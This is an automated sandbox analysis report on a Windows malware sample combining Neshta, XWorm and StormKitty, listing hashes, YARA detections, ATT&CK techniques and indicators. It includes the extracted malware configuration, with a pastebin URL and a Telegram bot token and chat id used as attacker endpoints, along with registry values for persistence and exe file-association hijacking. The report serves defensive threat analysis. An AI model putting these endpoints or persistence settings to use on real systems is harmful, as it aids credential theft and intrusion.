neshta | 48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
08-08-2024 20:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Size

929KB
MD5

8eb0e52dfb39029f6e6faf24da745154
SHA1

5ca96e568691238f92fcfc233869797c70928fd1
SHA256

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89
SHA512

3f55dc3a9212906713f4e28fceca2a23e471a963c958547c641207081cc8693ae29007bcb6168f4a3d446e06bbc654145623230876957d763b1cb25aaa683f09
SSDEEP

12288:+m7ZXRcg9nzqKpQDGufOG9FWpJcufIjfg5TOBLLrLwCuQbNLySp3gPJhwFMU:+IZh7nzFVufOVJcuJOBL/RJya38vU

Score

10^/10

neshta stormkitty xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%Temp%
install_file
explorer.exe
pastebin_url
https://pastebin.com/raw/qNxmZ4py
telegram
https://api.telegram.org/bot7178742128:AAEXQUhBJYl0OKqOJRwoAc2oyiBR9_StN1c/sendMessage?chat_id=5605545798

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/2876-338-0x000000001A720000-0x000000001A72E000-memory.dmp	disable_win_def

Detect Neshta payload 42 IoCs

Processes:

resource	yara_rule
C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe	family_neshta
C:\Windows\svchost.com	family_neshta
C:\MSOCache\ALLUSE~1\{9A861~1\ose.exe	family_neshta
C:\MSOCache\ALLUSE~1\{90140~1\DW20.EXE	family_neshta
C:\MSOCache\ALLUSE~1\{9A861~1\setup.exe	family_neshta
C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE	family_neshta
C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE	family_neshta
C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe	family_neshta
C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE	family_neshta
C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe	family_neshta
C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE	family_neshta
C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE	family_neshta
C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	family_neshta
behavioral1/memory/1944-213-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2788-214-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1964-220-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2216-226-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2332-234-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2576-243-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2140-249-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2564-250-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2820-256-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1624-262-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2264-268-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/3028-274-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2000-280-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2404-316-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2100-329-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2848-332-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2600-333-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2600-337-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2848-335-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect Xworm Payload 9 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\explorer.exe	family_xworm
C:\Users\Admin\AppData\Roaming\svchost.exe	family_xworm
behavioral1/memory/2592-72-0x0000000000EF0000-0x0000000000F0C000-memory.dmp	family_xworm
\Users\Admin\AppData\Roaming\Hiplace.exe	family_xworm
behavioral1/memory/3064-46-0x0000000000C60000-0x0000000000C7A000-memory.dmp	family_xworm
behavioral1/memory/2876-82-0x0000000000F80000-0x0000000000F98000-memory.dmp	family_xworm
behavioral1/memory/2760-331-0x0000000000D70000-0x0000000000D8C000-memory.dmp	family_xworm
behavioral1/memory/2764-367-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_xworm
behavioral1/memory/2084-368-0x0000000001280000-0x000000000129C000-memory.dmp	family_xworm

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2876-339-0x000000001DA00000-0x000000001DB20000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1732	powershell.exe
1220	powershell.exe
1876	powershell.exe
2396	powershell.exe
2980	powershell.exe
1928	powershell.exe
2772	powershell.exe
1092	powershell.exe
876	powershell.exe
1912	powershell.exe
2880	powershell.exe

Drops startup file 4 IoCs

Processes:

svchost.exeexplorer.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 27 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comHiplace.exeexplorer.exesvchost.comsvchost.comsvchost.exePORSCH~1.EXEsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.exeexplorer.exeexplorer.exesvchost.exeexplorer.exesvchost.exe

pid	process
2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2788	svchost.com
2576	svchost.com
3064	Hiplace.exe
2592	explorer.exe
2564	svchost.com
2600	svchost.com
2876	svchost.exe
1384	PORSCH~1.EXE
1944	svchost.com
1964	svchost.com
2216	svchost.com
2332	svchost.com
2140	svchost.com
2820	svchost.com
1624	svchost.com
2264	svchost.com
3028	svchost.com
2000	svchost.com
2404	svchost.com
2100	svchost.com
2080	svchost.exe
2760	explorer.exe
2764	explorer.exe
2636	svchost.exe
2084	explorer.exe
2600	svchost.exe

Loads dropped DLL 64 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com

pid	process
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2788	svchost.com
2576	svchost.com
2576	svchost.com
2564	svchost.com
2564	svchost.com
2564	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2600	svchost.com
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2600	svchost.com
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2600	svchost.com
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2600	svchost.com
2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
2600	svchost.com
1944	svchost.com
1944	svchost.com
1944	svchost.com
1944	svchost.com
1964	svchost.com
1964	svchost.com
1964	svchost.com
1964	svchost.com
2216	svchost.com
2216	svchost.com
2216	svchost.com
2216	svchost.com
2332	svchost.com
2332	svchost.com
2332	svchost.com
2332	svchost.com
2140	svchost.com
2140	svchost.com
2140	svchost.com
2140	svchost.com
2820	svchost.com
2820	svchost.com
2820	svchost.com
2820	svchost.com
1624	svchost.com
1624	svchost.com
1624	svchost.com
1624	svchost.com
2264	svchost.com

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Local\\Temp\\explorer.exe"	explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
3 pastebin.com
4 pastebin.com
5 pastebin.com

flow	ioc
2	pastebin.com
3	pastebin.com
4	pastebin.com
5	pastebin.com

Drops file in Program Files directory 64 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.com

description	ioc	process
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\WMPDMC.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmplayer.exe	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\DW\DWTRIG20.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\ImagingDevices.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE	svchost.com
File opened for modification	C:\PROGRA~2\WI54FB~1\wmpconfig.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~1\wabmig.exe	svchost.com
File opened for modification	C:\PROGRA~2\WI54FB~1\wmpconfig.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmprph.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GRAPH.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\setup_wm.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\OIS.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\misc.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~1\wabmig.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\WMPDMC.exe	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\POWERPNT.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~1\WinMail.exe	svchost.com

Drops file in Windows directory 33 IoCs

Processes:

svchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.compowershell.exeschtasks.exesvchost.comsvchost.com48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exepowershell.exesvchost.comsvchost.comsvchost.comschtasks.exepowershell.exesvchost.comsvchost.comsvchost.compowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1764 schtasks.exe
1728 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

Hiplace.exeexplorer.exesvchost.exe

pid process

3064 Hiplace.exe
2592 explorer.exe
2876 svchost.exe

pid	process
1764	schtasks.exe
1728	schtasks.exe

pid	process
3064	Hiplace.exe
2592	explorer.exe
2876	svchost.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeHiplace.exeexplorer.exesvchost.exe

pid	process
1732	powershell.exe
2396	powershell.exe
2980	powershell.exe
876	powershell.exe
1912	powershell.exe
2772	powershell.exe
1876	powershell.exe
2880	powershell.exe
1220	powershell.exe
1092	powershell.exe
3064	Hiplace.exe
2592	explorer.exe
2876	svchost.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

explorer.exesvchost.exepowershell.exeHiplace.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exeexplorer.exeexplorer.exesvchost.exeexplorer.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2592	explorer.exe
Token: SeDebugPrivilege	2876	svchost.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	3064	Hiplace.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
